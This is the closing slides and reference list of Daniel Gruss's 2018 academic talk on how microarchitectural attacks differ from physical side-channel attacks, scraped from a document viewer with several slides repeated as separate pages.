![Page 314: (Why) Are Microarchitectural Attacks Really Different than ... · attacks and their mitigations [36, 43] are outside the scope of this work. [...] 5 Daniel Gruss | Graz University](https://reader035.fdocuments.in/reader035/viewer/2022071210/6021cec46996713aba46c366/html5/thumbnails/314.jpg)
Conclusion www.tugraz.at
• large-scale attacks due to different threat model
• overlap could be leveraged to gain more complete picture
• space for promising mitigations (due to inherent restrictions for
the attacker)
64 Daniel Gruss — Graz University of Technology
![Page 315: (Why) Are Microarchitectural Attacks Really Different than ... · attacks and their mitigations [36, 43] are outside the scope of this work. [...] 5 Daniel Gruss | Graz University](https://reader035.fdocuments.in/reader035/viewer/2022071210/6021cec46996713aba46c366/html5/thumbnails/315.jpg)
Conclusion www.tugraz.at
• large-scale attacks due to different threat model
• overlap could be leveraged to gain more complete picture
• space for promising mitigations (due to inherent restrictions for
the attacker)
64 Daniel Gruss — Graz University of Technology
![Page 316: (Why) Are Microarchitectural Attacks Really Different than ... · attacks and their mitigations [36, 43] are outside the scope of this work. [...] 5 Daniel Gruss | Graz University](https://reader035.fdocuments.in/reader035/viewer/2022071210/6021cec46996713aba46c366/html5/thumbnails/316.jpg)
Conclusion www.tugraz.at
• large-scale attacks due to different threat model
• overlap could be leveraged to gain more complete picture
• space for promising mitigations (due to inherent restrictions for
the attacker)
64 Daniel Gruss — Graz University of Technology
![Page 317: (Why) Are Microarchitectural Attacks Really Different than ... · attacks and their mitigations [36, 43] are outside the scope of this work. [...] 5 Daniel Gruss | Graz University](https://reader035.fdocuments.in/reader035/viewer/2022071210/6021cec46996713aba46c366/html5/thumbnails/317.jpg)
Conclusion www.tugraz.at
• large-scale attacks due to different threat model
• overlap could be leveraged to gain more complete picture
• space for promising mitigations (due to inherent restrictions for
the attacker)
64 Daniel Gruss — Graz University of Technology
![Page 318: (Why) Are Microarchitectural Attacks Really Different than ... · attacks and their mitigations [36, 43] are outside the scope of this work. [...] 5 Daniel Gruss | Graz University](https://reader035.fdocuments.in/reader035/viewer/2022071210/6021cec46996713aba46c366/html5/thumbnails/318.jpg)
Conclusion www.tugraz.at
• large-scale attacks due to different threat model
• overlap could be leveraged to gain more complete picture
• space for promising mitigations (due to inherent restrictions for
the attacker)
64 Daniel Gruss — Graz University of Technology
![Page 319: (Why) Are Microarchitectural Attacks Really Different than ... · attacks and their mitigations [36, 43] are outside the scope of this work. [...] 5 Daniel Gruss | Graz University](https://reader035.fdocuments.in/reader035/viewer/2022071210/6021cec46996713aba46c366/html5/thumbnails/319.jpg)
I forgot the “Who am I” slide!!1 www.tugraz.at
I’m building up a group @ Graz University of Technology
→ looking for PhD students!
65 Daniel Gruss — Graz University of Technology
![Page 320: (Why) Are Microarchitectural Attacks Really Different than ... · attacks and their mitigations [36, 43] are outside the scope of this work. [...] 5 Daniel Gruss | Graz University](https://reader035.fdocuments.in/reader035/viewer/2022071210/6021cec46996713aba46c366/html5/thumbnails/320.jpg)
I forgot the “Who am I” slide!!1 www.tugraz.at
I’m building up a group @ Graz University of Technology
→ looking for PhD students!
65 Daniel Gruss — Graz University of Technology
![Page 321: (Why) Are Microarchitectural Attacks Really Different than ... · attacks and their mitigations [36, 43] are outside the scope of this work. [...] 5 Daniel Gruss | Graz University](https://reader035.fdocuments.in/reader035/viewer/2022071210/6021cec46996713aba46c366/html5/thumbnails/321.jpg)
I forgot the “Who am I” slide!!1 www.tugraz.at
I’m building up a group @ Graz University of Technology
→ looking for PhD students!
65 Daniel Gruss — Graz University of Technology
![Page 322: (Why) Are Microarchitectural Attacks Really Different than ... · attacks and their mitigations [36, 43] are outside the scope of this work. [...] 5 Daniel Gruss | Graz University](https://reader035.fdocuments.in/reader035/viewer/2022071210/6021cec46996713aba46c366/html5/thumbnails/322.jpg)
I forgot the “Who am I” slide!!1 www.tugraz.at
I’m building up a group @ Graz University of Technology
→ looking for PhD students!
65 Daniel Gruss — Graz University of Technology
![Page 323: (Why) Are Microarchitectural Attacks Really Different than ... · attacks and their mitigations [36, 43] are outside the scope of this work. [...] 5 Daniel Gruss | Graz University](https://reader035.fdocuments.in/reader035/viewer/2022071210/6021cec46996713aba46c366/html5/thumbnails/323.jpg)
I forgot the “Who am I” slide!!1 www.tugraz.at
I’m building up a group @ Graz University of Technology
→ looking for PhD students!
65 Daniel Gruss — Graz University of Technology
![Page 324: (Why) Are Microarchitectural Attacks Really Different than ... · attacks and their mitigations [36, 43] are outside the scope of this work. [...] 5 Daniel Gruss | Graz University](https://reader035.fdocuments.in/reader035/viewer/2022071210/6021cec46996713aba46c366/html5/thumbnails/324.jpg)
(Why) Are Microarchitectural Attacks Really
Different than Physical Side-Channel Attacks?
Daniel Gruss
September 10, 2018
Graz University of Technology
66 Daniel Gruss — Graz University of Technology
![Page 325: (Why) Are Microarchitectural Attacks Really Different than ... · attacks and their mitigations [36, 43] are outside the scope of this work. [...] 5 Daniel Gruss | Graz University](https://reader035.fdocuments.in/reader035/viewer/2022071210/6021cec46996713aba46c366/html5/thumbnails/325.jpg)
References
Michael Backes et al. Acoustic Side-Channel Attacks on Printers. In: USENIX
Security. 2010.
David Brumley et al. Remote timing attacks are practical. In: Computer Networks
48.5 (2005), pp. 701–716.
Daniel J. Bernstein. Cache-Timing Attacks on AES. 2004. url:
http://cr.yp.to/antiforgery/cachetiming-20050414.pdf.
Elad Carmon et al. Photonic Side Channel Attacks Against RSA. In: HOST’17.
2017.
Daniel Gruss et al. Rowhammer.js: A Remote Software-Induced Fault Attack in
JavaScript. In: DIMVA. 2016.
![Page 326: (Why) Are Microarchitectural Attacks Really Different than ... · attacks and their mitigations [36, 43] are outside the scope of this work. [...] 5 Daniel Gruss | Graz University](https://reader035.fdocuments.in/reader035/viewer/2022071210/6021cec46996713aba46c366/html5/thumbnails/326.jpg)
Daniel Gruss et al. Cache Template Attacks: Automating Attacks on Inclusive
Last-Level Caches. In: USENIX Security Symposium. 2015.
J. Alex Halderman et al. Lest we remember: cold-boot attacks on encryption keys.
In: Communications of the ACM (May 2009).
Michael Hutter et al. The temperature side channel and heating fault attacks. In:
International Conference on Smart Card Research and Advanced Applications.
Springer. 2013, pp. 219–235.
Paul Kocher et al. Differential power analysis. In: Annual International Cryptology
Conference. Springer. 1999, pp. 388–397.
Paul Kocher et al. Spectre Attacks: Exploiting Speculative Execution. In: S&P.
2019.
Emilia Kasper et al. Faster and Timing-Attack Resistant AES-GCM. In:
Cryptographic Hardware and Embedded Systems (CHES). 2009, pp. 1–17.
![Page 327: (Why) Are Microarchitectural Attacks Really Different than ... · attacks and their mitigations [36, 43] are outside the scope of this work. [...] 5 Daniel Gruss | Graz University](https://reader035.fdocuments.in/reader035/viewer/2022071210/6021cec46996713aba46c366/html5/thumbnails/327.jpg)
Vladimir Kiriansky et al. Speculative Buffer Overflows: Attacks and Defenses. In:
arXiv:1807.03757 (2018).
Moritz Lipp et al. ARMageddon: Cache Attacks on Mobile Devices. In: USENIX
Security Symposium. 2016.
Moritz Lipp et al. Nethammer: Inducing Rowhammer Faults through Network
Requests. In: arXiv:1711.08002 (2017).
Moritz Lipp et al. Meltdown: Reading Kernel Memory from User Space. In:
USENIX Security Symposium. 2018.
Stefan Mangard et al. Power analysis attacks: Revealing the secrets of smart
cards. Vol. 31. Springer Science & Business Media, 2008.
Yossef Oren et al. The Spy in the Sandbox: Practical Cache Attacks in JavaScript
and their Implications. In: CCS. 2015.
Josyula R Rao et al. EMpowering Side-Channel Attacks. In: IACR Cryptology
ePrint Archive 2001 (2001), p. 37.
![Page 328: (Why) Are Microarchitectural Attacks Really Different than ... · attacks and their mitigations [36, 43] are outside the scope of this work. [...] 5 Daniel Gruss | Graz University](https://reader035.fdocuments.in/reader035/viewer/2022071210/6021cec46996713aba46c366/html5/thumbnails/328.jpg)
Alexander Schlosser et al. Simple Photonic Emission Analysis of AES. In:
CHES’12. 2012.
Michael Schwarz et al. Malware Guard Extension: Using SGX to Conceal Cache
Attacks. In: DIMVA. 2017.
Michael Schwarz et al. Automated Detection, Exploitation, and Elimination of
Double-Fetch Bugs using Modern CPU Features. In: AsiaCCS (2018).
Michael Schwarz et al. NetSpectre: Read Arbitrary Memory over Network. In:
arXiv:1807.10535 (2018).
Andrei Tatar et al. Throwhammer: Rowhammer Attacks over the Network and
Defenses. In: USENIX ATC. 2018.
Jo Van Bulck et al. Foreshadow: Extracting the Keys to the Intel SGX Kingdom
with Transient Out-of-Order Execution. In: USENIX Security Symposium. 2018.
Ofir Weisse et al. Foreshadow-NG: Breaking the Virtual Memory Abstraction with
Transient Out-of-Order Execution. In: Technical report (2018).